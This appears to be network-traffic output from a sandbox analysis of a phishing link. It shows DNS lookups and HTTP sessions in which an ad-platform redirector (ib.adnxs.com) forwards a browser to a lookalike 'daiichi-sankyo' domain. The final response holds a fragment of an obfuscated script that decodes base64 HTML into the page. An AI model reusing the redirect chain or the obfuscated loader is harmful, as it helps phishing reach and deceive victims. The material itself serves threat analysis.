                                        Jan 7, 2025 09:16:21.013068914 CET192.168.2.41.1.1.10x6696Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.015980005 CET192.168.2.41.1.1.10x438Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:21.016367912 CET192.168.2.41.1.1.10xe287Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.016508102 CET192.168.2.41.1.1.10x699bStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:21.802671909 CET192.168.2.41.1.1.10x6ec9Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.802988052 CET192.168.2.41.1.1.10x9506Standard query (0)code.jquery.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:21.836874962 CET192.168.2.41.1.1.10xb8fcStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.837019920 CET192.168.2.41.1.1.10xaab5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:22.354929924 CET192.168.2.41.1.1.10xe691Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:22.354929924 CET192.168.2.41.1.1.10xcfeaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:22.381177902 CET192.168.2.41.1.1.10x92edStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:22.381876945 CET192.168.2.41.1.1.10x395eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:24.719201088 CET192.168.2.41.1.1.10x35c8Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:24.719428062 CET192.168.2.41.1.1.10x67Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 7, 2025 09:16:15.287319899 CET1.1.1.1192.168.2.40xc628No error (0)www.google.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:15.287672043 CET1.1.1.1192.168.2.40x22fbNo error (0)www.google.com142.250.74.196A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.035636902 CET1.1.1.1192.168.2.40xc73aNo error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:17.681991100 CET1.1.1.1192.168.2.40x97e7No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:19.705059052 CET1.1.1.1192.168.2.40x2ee9No error (0)daiichi-sankyo.uronfecit.ru188.114.96.3A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:19.705059052 CET1.1.1.1192.168.2.40x2ee9No error (0)daiichi-sankyo.uronfecit.ru188.114.97.3A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:19.745146036 CET1.1.1.1192.168.2.40x93cbNo error (0)daiichi-sankyo.uronfecit.ru65IN (0x0001)false
                                        Jan 7, 2025 09:16:21.019028902 CET1.1.1.1192.168.2.40x174eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.019028902 CET1.1.1.1192.168.2.40x174eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.019028902 CET1.1.1.1192.168.2.40x174eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.019028902 CET1.1.1.1192.168.2.40x174eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.019891977 CET1.1.1.1192.168.2.40x6696No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.019891977 CET1.1.1.1192.168.2.40x6696No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.022584915 CET1.1.1.1192.168.2.40x438No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:21.023010015 CET1.1.1.1192.168.2.40xe287No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.023010015 CET1.1.1.1192.168.2.40xe287No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.023201942 CET1.1.1.1192.168.2.40x699bNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:21.809571981 CET1.1.1.1192.168.2.40x6ec9No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.809571981 CET1.1.1.1192.168.2.40x6ec9No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.809571981 CET1.1.1.1192.168.2.40x6ec9No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.809571981 CET1.1.1.1192.168.2.40x6ec9No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.843411922 CET1.1.1.1192.168.2.40xb8fcNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.843411922 CET1.1.1.1192.168.2.40xb8fcNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:21.843864918 CET1.1.1.1192.168.2.40xaab5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:22.361409903 CET1.1.1.1192.168.2.40xe691No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:22.361409903 CET1.1.1.1192.168.2.40xe691No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:22.362149000 CET1.1.1.1192.168.2.40xcfeaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:22.387878895 CET1.1.1.1192.168.2.40x92edNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:22.387878895 CET1.1.1.1192.168.2.40x92edNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 7, 2025 09:16:22.388897896 CET1.1.1.1192.168.2.40x395eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 7, 2025 09:16:24.725918055 CET1.1.1.1192.168.2.40x35c8No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                        • ib.adnxs.com
                                        • daiichi-sankyo.uronfecit.ru
                                        • https:
                                          • code.jquery.com
                                          • cdnjs.cloudflare.com
                                          • challenges.cloudflare.com
                                        • a.nel.cloudflare.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449740185.89.210.212803696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 7, 2025 09:16:17.052551031 CET485OUTGET /getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/ HTTP/1.1
                                        Host: ib.adnxs.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Jan 7, 2025 09:16:17.672841072 CET1070INHTTP/1.1 307 Redirection
                                        Server: nginx/1.23.4
                                        Date: Tue, 07 Jan 2025 08:16:17 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        Cache-Control: no-store, no-cache, private
                                        Pragma: no-cache
                                        Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                        P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                        X-XSS-Protection: 0
                                        Access-Control-Allow-Credentials: true
                                        Access-Control-Allow-Origin: *
                                        Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                        Location: https://ib.adnxs.com/sbounce?%2Fgetuid%3Fhttps%253a%252f%252fDaiichi-sankyo.uronfecit.ru%2FHlnz62kK%2F
                                        AN-X-Request-Uuid: 440e905a-c9cf-4fdb-8150-183f57fdc781
                                        Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Tue, 26-Dec-2034 08:16:17 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                        X-Proxy-Origin: 8.46.123.189; 8.46.123.189; 942.bm-nginx-loadbalancer.mgmt.ams3.adnexus.net; adnxs.com


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449739185.89.210.212803696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 7, 2025 09:17:02.048158884 CET6OUTData Raw: 00
                                        Data Ascii:


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449742185.89.210.904433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:18 UTC736OUTGET /sbounce?%2Fgetuid%3Fhttps%253a%252f%252fDaiichi-sankyo.uronfecit.ru%2FHlnz62kK%2F HTTP/1.1
                                        Host: ib.adnxs.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:18 UTC1499INHTTP/1.1 307 Redirection
                                        Server: nginx/1.23.4
                                        Date: Tue, 07 Jan 2025 08:16:18 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 0
                                        Connection: close
                                        Cache-Control: no-store, no-cache, private
                                        Pragma: no-cache
                                        Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                        P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                        X-XSS-Protection: 0
                                        Access-Control-Allow-Credentials: true
                                        Access-Control-Allow-Origin: *
                                        Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                        Location: https://ib.adnxs.com/bounce?%2Fsbounce%3F%252Fgetuid%253Fhttps%25253a%25252f%25252fDaiichi-sankyo.uronfecit.ru%252FHlnz62kK%252F
                                        AN-X-Request-Uuid: 14b3ab93-5402-4055-beff-b33cbcc16372
                                        Set-Cookie: XANDR_PANID=9yHpGXri8Ioe_BUtNnupIXBf8F_T6hcftGFJpgm94DCGwN_F4lPnR5O6_n9GBFbtDUA95kc1kfVHpnNwpUes3Mnim-bnKmOUOFe3QE0JGhw.; SameSite=None; Path=/; Max-Age=7776000; Expires=Mon, 07-Apr-2025 08:16:18 GMT; Domain=.adnxs.com; Secure; Partitioned
                                        Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Tue, 26-Dec-2034 08:16:18 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                        Set-Cookie: uuid2=6436725576506890040; SameSite=None; Path=/; Max-Age=7776000; Expires=Mon, 07-Apr-2025 08:16:18 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                        X-Proxy-Origin: 8.46.123.189; 8.46.123.189; 941.bm-nginx-loadbalancer.mgmt.ams3.adnexus.net; adnxs.com


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449743185.89.210.904433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:19 UTC1179OUTGET /bounce?%2Fsbounce%3F%252Fgetuid%253Fhttps%25253a%25252f%25252fDaiichi-sankyo.uronfecit.ru%252FHlnz62kK%252F HTTP/1.1
                                        Host: ib.adnxs.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: XANDR_PANID=9yHpGXri8Ioe_BUtNnupIXBf8F_T6hcftGFJpgm94DCGwN_F4lPnR5O6_n9GBFbtDUA95kc1kfVHpnNwpUes3Mnim-bnKmOUOFe3QE0JGhw.; receive-cookie-deprecation=1; uuid2=6436725576506890040
                                        2025-01-07 08:16:19 UTC1410INHTTP/1.1 302 Found
                                        Server: nginx/1.23.4
                                        Date: Tue, 07 Jan 2025 08:16:19 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 0
                                        Connection: close
                                        Cache-Control: no-store, no-cache, private
                                        Pragma: no-cache
                                        Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                        P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                        X-XSS-Protection: 0
                                        Access-Control-Allow-Credentials: true
                                        Access-Control-Allow-Origin: *
                                        Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                        Location: https://Daiichi-sankyo.uronfecit.ru/Hlnz62kK/
                                        AN-X-Request-Uuid: 475eb2ea-fff6-45fe-ad37-84e4bb1c907c
                                        Set-Cookie: XANDR_PANID=9yHpGXri8Ioe_BUtNnupIXBf8F_T6hcftGFJpgm94DCGwN_F4lPnR5O6_n9GBFbtDUA95kc1kfVHpnNwpUes3Mnim-bnKmOUOFe3QE0JGhw.; SameSite=None; Path=/; Max-Age=7776000; Expires=Mon, 07-Apr-2025 08:16:19 GMT; Domain=.adnxs.com; Secure; Partitioned
                                        Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Tue, 26-Dec-2034 08:16:19 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                        Set-Cookie: uuid2=6436725576506890040; SameSite=None; Path=/; Max-Age=7776000; Expires=Mon, 07-Apr-2025 08:16:19 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                        X-Proxy-Origin: 8.46.123.189; 8.46.123.189; 941.bm-nginx-loadbalancer.mgmt.ams3.adnexus.net; adnxs.com


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449744188.114.96.34433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:20 UTC679OUTGET /Hlnz62kK/ HTTP/1.1
                                        Host: daiichi-sankyo.uronfecit.ru
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:20 UTC1244INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: no-cache, private
                                        cf-cache-status: DYNAMIC
                                        vary: accept-encoding
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0UE8%2BEXtmFbRmjjM1kmPomYd5kUvlIGw89SH%2FX3rnGVL6XWxeN4GjB5tmJPwmZzTafdIG%2FYh2CVv2As4WLDw0FiEpynzWobj7TTUykNrn%2BsLpA5PcKFsI0fXuFUWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1392&min_rtt=1365&rtt_var=531&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1580&delivery_rate=2086446&cwnd=251&unsent_bytes=0&cid=178156e79ad3fb83&ts=410&x=0"
                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6ImV4S3YvNFBDL29ibHRaUHpjZjY4dVE9PSIsInZhbHVlIjoiOW4zaXdSc2MyQ2FaUGx4SHN6QVdXOU5qRE1CZzlITDY2NGRJdHVMSmMxNmJFNHViUDFYaldOSHdkRzNWQ2I0eVA2TE9TRXg3c2Q0Q0lyQzZaNlNyY0tjQVBuYXNKWkNFc20xcFZDRCtYd0NTMk9QcHFaUklYalRWaEZQSzErVmkiLCJtYWMiOiIwNWY5NjI4Mjg5Mjk1ZDQ2OGRkMTI1OWEzNzU0MzVjMTFmNzM4NmRlNmI0Y2M0NmE1ZWFkOWQ1ZDM1ZjdmNDNlIiwidGFnIjoiIn0%3D; expires=Tue, 07-Jan-2025 10:16:20 GMT; Max-Age=7200; path=/; secure; samesite=none
                                        2025-01-07 08:16:20 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 35 45 51 31 6b 32 4d 6d 46 4f 62 55 74 74 55 53 74 36 54 56 4e 5a 4d 55 4a 6e 56 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 6c 63 76 4f 56 51 33 4d 55 4a 56 56 6a 56 53 4e 55 78 49 51 55 4e 4d 64 55 70 58 62 6a 4e 72 4e 7a 46 4c 4e 47 30 32 51 33 52 49 4e 6d 31 49 5a 6c 5a 52 55 45 78 51 55 56 4a 46 4e 30 45 34 59 58 5a 43 4e 56 64 42 5a 6c 6c 79 5a 44 52 57 61 48 4d 76 52 32 74 6d 4c 7a 4a 49 56 58 49 72 53 56 56 57 54 53 74 6e 62 6a 5a 58 5a 58 4d 79 61 54 64 4c 56 48 4e 5a 61 54 59 30 57 54 52 52 4e 57 4e 70 61 30 38 78 54 56 4d 7a 63 6e 5a 58 4b 30 39 6a 53 47 31 48 57 57 31 6b 55 44 56 6c 61 47 5a 5a 53 6b 59 76 5a 45 6b
                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Im5EQ1k2MmFObUttUSt6TVNZMUJnV2c9PSIsInZhbHVlIjoielcvOVQ3MUJVVjVSNUxIQUNMdUpXbjNrNzFLNG02Q3RINm1IZlZRUExQUVJFN0E4YXZCNVdBZllyZDRWaHMvR2tmLzJIVXIrSVVWTStnbjZXZXMyaTdLVHNZaTY0WTRRNWNpa08xTVMzcnZXK09jSG1HWW1kUDVlaGZZSkYvZEk
                                        2025-01-07 08:16:20 UTC1369INData Raw: 34 64 65 30 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 6e 20 62 75 73 69 6e 65 73 73 20 72 65 71 75 69 72 65 73 20 74 72 61 69 6e 69 6e 67 2c 20 64 69 73 63 69 70 6c 69 6e 65 2c 20 61 6e 64 20 68 61 72 64 20 77 6f 72 6b 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 73 5a 46 51 75 64 58 4a 76 62 6d 5a 6c 59 32 6c 30 4c 6e 4a 31 4c 30 68 73 62 6e 6f 32 4d 6d 74 4c 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e
                                        Data Ascii: 4de0... Success in business requires training, discipline, and hard work. --><script>if(atob("aHR0cHM6Ly9sZFQudXJvbmZlY2l0LnJ1L0hsbno2MmtLLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5n
                                        2025-01-07 08:16:20 UTC1369INData Raw: 30 37 66 51 30 4b 49 30 74 33 54 56 4e 43 5a 6b 5a 73 59 31 49 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 4e 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a
                                        Data Ascii: 07fQ0KI0t3TVNCZkZsY1IuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTNweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZ
